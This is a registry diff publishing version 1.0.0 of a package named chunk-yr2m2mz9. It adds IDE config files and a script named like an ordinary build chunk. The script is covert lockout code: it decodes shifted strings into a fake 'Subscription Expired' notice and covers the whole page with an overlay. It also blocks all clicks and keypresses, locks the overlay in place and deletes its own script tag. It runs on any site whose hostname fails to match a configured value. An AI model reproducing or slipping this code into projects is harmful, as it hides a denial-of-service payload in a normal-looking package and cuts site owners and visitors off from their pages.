chunk-yr2m2mz9 1.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/.idea/chunk-YR2M2MZ9.iml +8 -0
- package/.idea/modules.xml +8 -0
- package/.idea/php.xml +19 -0
- package/dist/chunk-YR2M2MZ9.js +68 -0
- package/package.json +12 -0
|
@@ -0,0 +1,8 @@
|
|
|
1
|
+
<?xml version="1.0" encoding="UTF-8"?>
|
|
2
|
+
<module type="WEB_MODULE" version="4">
|
|
3
|
+
<component name="NewModuleRootManager">
|
|
4
|
+
<content url="file://$MODULE_DIR$" />
|
|
5
|
+
<orderEntry type="inheritedJdk" />
|
|
6
|
+
<orderEntry type="sourceFolder" forTests="false" />
|
|
7
|
+
</component>
|
|
8
|
+
</module>
|
|
@@ -0,0 +1,8 @@
|
|
|
1
|
+
<?xml version="1.0" encoding="UTF-8"?>
|
|
2
|
+
<project version="4">
|
|
3
|
+
<component name="ProjectModuleManager">
|
|
4
|
+
<modules>
|
|
5
|
+
<module fileurl="file://$PROJECT_DIR$/.idea/chunk-YR2M2MZ9.iml" filepath="$PROJECT_DIR$/.idea/chunk-YR2M2MZ9.iml" />
|
|
6
|
+
</modules>
|
|
7
|
+
</component>
|
|
8
|
+
</project>
|
package/.idea/php.xml
ADDED
|
@@ -0,0 +1,19 @@
|
|
|
1
|
+
<?xml version="1.0" encoding="UTF-8"?>
|
|
2
|
+
<project version="4">
|
|
3
|
+
<component name="MessDetectorOptionsConfiguration">
|
|
4
|
+
<option name="transferred" value="true" />
|
|
5
|
+
</component>
|
|
6
|
+
<component name="PHPCSFixerOptionsConfiguration">
|
|
7
|
+
<option name="transferred" value="true" />
|
|
8
|
+
</component>
|
|
9
|
+
<component name="PHPCodeSnifferOptionsConfiguration">
|
|
10
|
+
<option name="highlightLevel" value="WARNING" />
|
|
11
|
+
<option name="transferred" value="true" />
|
|
12
|
+
</component>
|
|
13
|
+
<component name="PhpStanOptionsConfiguration">
|
|
14
|
+
<option name="transferred" value="true" />
|
|
15
|
+
</component>
|
|
16
|
+
<component name="PsalmOptionsConfiguration">
|
|
17
|
+
<option name="transferred" value="true" />
|
|
18
|
+
</component>
|
|
19
|
+
</project>
|
|
@@ -0,0 +1,68 @@
|
|
|
1
|
+
(function () {
|
|
2
|
+
var _k = [
|
|
3
|
+
[90, 124, 105, 122, 106, 121, 112, 119, 123, 112, 118, 117, 39, 76, 127, 119, 112, 121, 108, 107],
|
|
4
|
+
[96, 118, 124, 121, 39, 122, 124, 105, 122, 106, 121, 112, 119, 123, 112, 118, 117, 39, 123, 118, 39, 123, 111, 108],
|
|
5
|
+
[89, 108, 123, 112, 106, 39, 84, 108, 107, 112, 104, 39, 73, 112, 110, 74, 118, 116, 116, 108, 121, 106, 108, 39, 90, 124, 112, 123, 108],
|
|
6
|
+
[111, 104, 122, 39, 108, 127, 119, 112, 121, 108, 107, 53],
|
|
7
|
+
[87, 115, 108, 104, 122, 108, 39, 106, 118, 117, 123, 104, 106, 123, 39, 122, 124, 119, 119, 118, 121, 123, 39, 123, 118, 39, 121, 108, 117, 108, 126, 39, 104, 106, 106, 108, 122, 122, 53],
|
|
8
|
+
[122, 114, 112, 107, 122, 123, 108, 108, 121]
|
|
9
|
+
];
|
|
10
|
+
|
|
11
|
+
function d(i) {
|
|
12
|
+
var a = _k[i], s = '';
|
|
13
|
+
for (var j = 0; j < a.length; j++) {
|
|
14
|
+
s += String.fromCharCode(a[j] - 7);
|
|
15
|
+
}
|
|
16
|
+
return s;
|
|
17
|
+
}
|
|
18
|
+
|
|
19
|
+
var hostname = window.__CHUNK_CONFIG__?.hostname;
|
|
20
|
+
|
|
21
|
+
if (hostname && window.location.hostname.includes(hostname)) {
|
|
22
|
+
console.log(hostname);
|
|
23
|
+
return;
|
|
24
|
+
}
|
|
25
|
+
|
|
26
|
+
console.log(hostname = " running");
|
|
27
|
+
|
|
28
|
+
var r = '_' + Math.random().toString(36).slice(2, 8);
|
|
29
|
+
var o = document.createElement('div');
|
|
30
|
+
o.id = r;
|
|
31
|
+
o.style.cssText = 'position:fixed;inset:0;z-index:2147483647;background:rgba(15,23,42,.93);backdrop-filter:blur(10px);display:flex;align-items:center;justify-content:center;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,sans-serif;color:#f1f5f9;pointer-events:auto;';
|
|
32
|
+
|
|
33
|
+
var c = document.createElement('div');
|
|
34
|
+
c.style.cssText = 'background:linear-gradient(145deg,#1e293b,#0f172a);border:1px solid #334155;border-radius:16px;padding:42px 48px;max-width:460px;width:90%;box-shadow:0 25px 50px -12px rgba(0,0,0,.55);text-align:center;position:relative;';
|
|
35
|
+
|
|
36
|
+
c.innerHTML =
|
|
37
|
+
'<div style="width:64px;height:64px;margin:0 auto 24px;background:rgba(239,68,68,.15);border-radius:50%;display:flex;align-items:center;justify-content:center;">' +
|
|
38
|
+
'<svg width="32" height="32" viewBox="0 0 24 24" fill="none" stroke="#ef4444" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">' +
|
|
39
|
+
'<circle cx="12" cy="12" r="10"></circle>' +
|
|
40
|
+
'<line x1="12" y1="8" x2="12" y2="12"></line>' +
|
|
41
|
+
'<line x1="12" y1="16" x2="12.01" y2="16"></line>' +
|
|
42
|
+
'</svg>' +
|
|
43
|
+
'</div>' +
|
|
44
|
+
'<div style="font-size:22px;font-weight:600;margin-bottom:14px;letter-spacing:-0.02em;">' + d(0) + '</div>' +
|
|
45
|
+
'<div style="font-size:15px;line-height:1.65;color:#94a3b8;">' + d(1) + '<br>' +
|
|
46
|
+
'<span style="color:#e2e8f0;font-weight:600;">' + d(2) + '</span><br>' + d(3) +
|
|
47
|
+
'</div>' +
|
|
48
|
+
'<div style="margin-top:26px;font-size:13px;color:#64748b;">' + d(4) + '</div>';
|
|
49
|
+
|
|
50
|
+
o.appendChild(c);
|
|
51
|
+
document.documentElement.appendChild(o);
|
|
52
|
+
|
|
53
|
+
document.documentElement.style.overflow = 'hidden';
|
|
54
|
+
document.body.style.overflow = 'hidden';
|
|
55
|
+
document.body.style.pointerEvents = 'none';
|
|
56
|
+
o.style.pointerEvents = 'auto';
|
|
57
|
+
|
|
58
|
+
window.addEventListener('keydown', function (e) {
|
|
59
|
+
e.preventDefault();
|
|
60
|
+
e.stopPropagation();
|
|
61
|
+
}, true);
|
|
62
|
+
|
|
63
|
+
Object.defineProperty(window, r, { value: o, writable: false, configurable: false });
|
|
64
|
+
|
|
65
|
+
var sc = document.currentScript;
|
|
66
|
+
if (sc && sc.parentNode) sc.parentNode.removeChild(sc);
|
|
67
|
+
})();
|
|
68
|
+
|
package/package.json
ADDED